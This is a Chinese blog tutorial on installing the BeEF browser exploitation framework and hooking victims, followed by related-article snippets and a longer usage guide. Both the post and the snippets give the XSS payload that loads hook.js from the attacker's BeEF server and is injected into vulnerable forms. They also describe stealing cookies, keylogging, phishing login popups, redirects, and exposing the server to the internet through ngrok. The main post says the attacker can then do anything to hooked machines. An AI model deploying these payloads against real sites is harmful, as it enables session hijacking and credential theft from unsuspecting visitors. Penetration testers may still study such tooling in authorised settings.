XSS渗透框架Beef的安装和简单使用

最新推荐文章于 2025-03-13 19:46:45 发布
最新推荐文章于 2025-03-13 19:46:45 发布
阅读量1.6k 收藏 2
点赞数
分类专栏: Linux 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_21007661/article/details/109851498
版权

BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。

下载beef
https://github.com/beefproject/beef

解压进入beef-master
2020-11-09_20-47.png
输入bundle install进行安装

安装完成后需要打开config.yaml修改帐号密码
2020-11-09_20-47_1.png
修改密码之后启动beef

./beef

在浏览器内输入命令行界面的http://本机ip:3000/ui/authentication访问,在beef登录界面输入beef的用户名和密码登录beef界面

登录后,将<script src='http://IP(运行beef主机的IP):3000/hook.js'></script>插入存在xss漏洞的表单中,然后访问被上马的网页。如图
2020-11-09_20-44.png

回到Manjaro,出现了被攻击的机子,这时你就可以用Commands模块的功能为所欲为了。

《WEB安全渗透测试》(31)BeEF-XSS一款红队XSS神器
午夜安全
09-25 2002
我们知道XSS漏洞分为存储型、反射型、DOM型,最常见的就是利用XSS漏洞弹窗,进一步获取用户Cookie信息。可是如今的WEB系统,有的已经设置HttpOnly属性,有的在请求头中使用Authorization字段提供token令牌,这导致了我们难以获取到用户的身份信息。在这个背景下,XSS漏洞好像越来越没用了。BeEF-XSS是一款非常强大的XSS平台,集成了许多payload,利用它可以极大的提高XSS漏洞的威力。
BEEF的搭建与使用
王意林的专栏
07-17 1万+
安装与搭建 beef是ruby写的,在windows下安装beef还是有些麻烦的,需要装很多东西。 源码在github googlecode等地方均有下载 http://code.google.com/p/beef/downloads/list https://github.com/beefproject/beef 在windows下配置ruby,推荐大家使用railsinstal
beef-xss安装使用
Bu2n的博客
12-07 3658
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
XSS框架安装BEEF
3569
07-18 2737
这次部署邮件服务器大致分为3个步骤 » 安装GEM » 安装配置BEEF » 测试 » 安装GEM 步骤 1 » 安装rvm。 wget -O 123 https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer chmod +x 123 ./123 安装环境需
揭秘最为知名的黑客工具之一:BeEF(非常详细)零基础入门到精通,收藏这一篇就够了
A1_3_9_7的博客
03-13 647
BeEF(The Browser Exploitation Framework)是一款强大的浏览器渗透测试框架,主要用于对浏览器进行安全评估攻击。通过控制受害者的浏览器,渗透测试人员可以执行多种攻击技术,如窃取信息、执行恶意代码等。BeEF 的目标是揭示现代浏览器的安全风险,并为安全研究人员提供一个强大的测试平台。
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
热门推荐
Martin-share的博客
02-12 1万+
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
CentOS安装beEFXSS平台
weixin_30794851的博客
05-18 1557
提到xss平台,大部分人都在用xsser.me的源码搭建,xsser.me源码搭建的平台虽然好用,但是功能不够强大,比如无法Metasploit配合使用进行更深一步的入侵测试。 这次部署邮件服务器大致分为3个步骤: 安装GEM 安装配置beEF 测试 >>安装GEM 步骤 1 » 安装rvm。导入key curl -sSL https://rvm.io/...
Beef xss神器
weixin_30474613的博客
06-08 309
KALI中启动BEEFXSS PAYLOAD为 <script src=”http://攻击机IP:3000/hook.js”></script> 将攻击代码插入到存储型XSS中 受害者访问存储型XSS界面,可以看到受害者不停地与攻击机进行通信 可以执行非常多的功能 2.BruteXSS 地址:https://github.com/...
渗透测试工具beefXSS渗透测试工具beef如何安装使用
03-02 559
目录 事情是这样的 beef介绍 beef工作原理简介 kali下使用beef beef配置IP地址及默认密码 使用beef攻击流程 启动beef 通过web端访问 1、输入config.xml中配置的用户名密码,登录beef管理台 2、在网站中植入hook.js代码 3、客户端192.168.107.110,访问这个页面,就会被beef勾住,浏览器的大量信息就被beef获取到了 4、获取浏览器cookie 5、网页重定向,目标浏览器跳转到你指定的网页 6、登录弹窗,获取用户名密码 模块颜色及解释 回顾
XSS自动化工具——Beef
世间繁华梦一出
03-10 5799
Beef使用一、Beef简介二、beef的下载安装三、Beef配置四、Beef使用五、Beef的主要功能 在我的记忆之中之前是有些过关于beef这款工具的使用的文章的,然而最近整理博客,一看,发现怎么没有了,可能是我忘了吧,或者可能也可能是在梦里写了。。。今天来写一下吧 一、Beef简介 Browser Exploitation Framework (BeEFBeEF 是目前最强大的浏览器开源渗透测试框架,通过xss漏洞配合JS脚本Metasploit进行渗透BeEF 是基于Ruby语言编写的
Kali下安装使用BeEF:反射型与存储型XSS攻击、Cookie会话劫持、键盘监听及浏览器操控技巧
xt350488的博客
07-27 1171
更常见的称呼是BeEF(The Browser Exploitation Framework),是一个开源的浏览器漏洞利用框架。它由Michał Zalewski于2006年创建,旨在帮助渗透测试人员评估Web浏览器的安全性,发现并利用其中的漏洞。
beef工具-01】神器beef安装与简介
m0_64378913的博客
06-01 8017
目录1 beef概述1 beef简介1.2 beef2 beef安装3 beef的重要网址4 简单测试5 总结参考文章 1 beef概述 1 beef简介 BeEF 是浏览器开发框架的缩写。 它是一款专注于网络浏览器的渗透测试工具。 随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况。 与其他安全框架不同,BeEF 超越了加固的网络边界客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器。
xss跨站漏洞】xss漏洞利用工具beef安装
2302_79590880的博客
02-22 1046
xss工具beef的服务器安装
CentOS7搭建XSS平台
深耕网络安全领域,聚焦护网行动(HW)、渗透测试、等级保护(等保)、CTF 竞赛四大核心方向,提供技术干货、实战经验与行业洞察。
01-05 1128
我的服务器是CentOS7.8 1、安装php 7 CentOS7的默认PHP版本是PHP5,但是如果我们要安装PHP7,不需要将现有的PHP5删除,只要将PHP升级到PHP7即可。 使用 yum provides php 命令可以获取CentOS7的PHP包安装情况。显示的是在现有的安装源中能够安装的最新版本为:php-5.4.16-46.el7.x86_64 1) 在安装PHP7之前,建议先升级更新一下CentOS7的安装包: yum -y update :升级所有软件包的同时也升级软件系统内核;
kali,beef-xss安装使用
m0_73581247的博客
06-22 2393
1.Beef工具 1.1 Beef工具介绍   Beef是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本 Metasploit进行渗透; Beef是基于Ruby语言编写的,并且支持图形化界面,操作简单。   新版的kail已经不自带beef工具了,需要自己下载。并且目前只支持macosLinux系统。1.2 Beef工具安装   在安装beef工具之前建议更新一下源   apt-get update   apt-get install beef-xss 时间比较久,可以去放松一会   启
kali下载beef-xss及利用
qq_53175607的博客
12-15 1973
1.beef-xss下载 使用apt-get update 更新kali(不是管理员用户前面加sudo) apt-get install beef-xss 下载beef(不是管理员用户前面加sudo) 2.利用 启动输入命令beef-xss http://kaliip:3000/ui/panel打开登录页面 构建一个简单xss html页面 <html> <head> <script src='http://kaliip:3000/hook.js'></
beef安装具体过程
qq_35398399的博客
10-27 1846
新版kali的BeEF安装使用root权限安装beef-xss安装apt --fix-broken install![在这里插入图片描述](https://img-blog.csdnimg.cn/20201027105521422.png#pic_center)安装beef-xss运行beef-xss登录beef网站进行具体操作 使用root权限 安装了一个月,一直没有办法安装上kali,终于有一天不知道是哪位锦鲤保佑,突然我就安装上了。再次分享给大家我的经验。 1.利用sudo su进入root权限 安
DVWA-xss储存型及beef下载(kali)
weixin_63750160的博客
04-08 344
如果密码用户不知道在etc/beef-xss/config.yaml可以查看。通过beef拿到了cookies之后在网页下写cookies。这里是可以修改的不修改的话代码是不全的。这是偷cookie的就是代码。这里的ip为虚拟机的地址。
beef安装密码修改
尘玥的故事
09-23 725
按esc后输入:wq!保存并退出配置文件。 beef beef-xss beef-xss-stop beef修改密码 beef安装 BEEF Beef 修改密码
beef-xss详细使用教程
最新发布
03-18
### BeEF XSS Framework 使用指南 #### 什么是BeEFBeEF(Browser Exploitation Framework)是一个用于浏览器渗透测试的工具框架。它允许安全研究人员分析演示浏览器作为攻击媒介的风险。通过注入恶意JavaScript代码,BeEF可以控制受害者的浏览器会话,并执行多种攻击向量。 #### 安装BeEF安装BeEF,可以通过以下命令完成: ```bash git clone https://github.com/beefproject/beef.git cd beef bundle install ``` 运行BeEF服务时,使用如下命令: ```bash ruby beef.rb ``` 默认情况下,BeEF会在`http://localhost:3000/ui/panel`上启动管理界面,默认用户名密码均为`beef`[^4]。 #### 配置BeEF Hook Script 为了利用BeEF的功能,需要将目标用户的浏览器连接到BeEF服务器。这通常通过在存在XSS漏洞的目标网站中嵌入`hook.js`脚本来实现。例如,在反射型或存储型XSS场景下,可以插入以下HTML代码片段: ```html <script src="http://<your_beef_server_ip>:3000/hook.js"></script> ``` 这里的`<your_beef_server_ip>`应替换为实际部署BeEF的IP地址。 #### 测试环境搭建 假设已经有一个本地PHP文件`xss.php`,其中包含简单的反射型XSS漏洞。以下是可能的内容示例: ```php <?php echo $_GET['input']; ?> ``` 访问URL `http://127.0.0.1/engineer/xss.php?input=<script%20src="http://<your_beef_server_ip>:3000/hook.js"></script>` 将触发BeEF钩子脚本加载[^3]。 #### 利用BeEF进行渗透测试 一旦受害者浏览了含有上述脚本的页面,他们的浏览器会被标记为“在线”,并显示在BeEF控制面板中的模块列表里。此时可以选择不同的攻击模块来评估潜在风险,比如收集系统信息、窃取Cookie或者模拟键盘输入等操作。 #### 跨网络使用BeEF (BeeF-Over-Wan) 对于希望在外网环境下开展测试的情况,推荐采用类似Ngrok这样的反向代理解决方案。具体做法涉及设置隧道并将外部流量导向内部BeEF实例。有关更详细的指导,请参阅专门文档[BeeF-Over-Wan](https://github.com/snoopysecurity/beef-over-wan)[^5]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值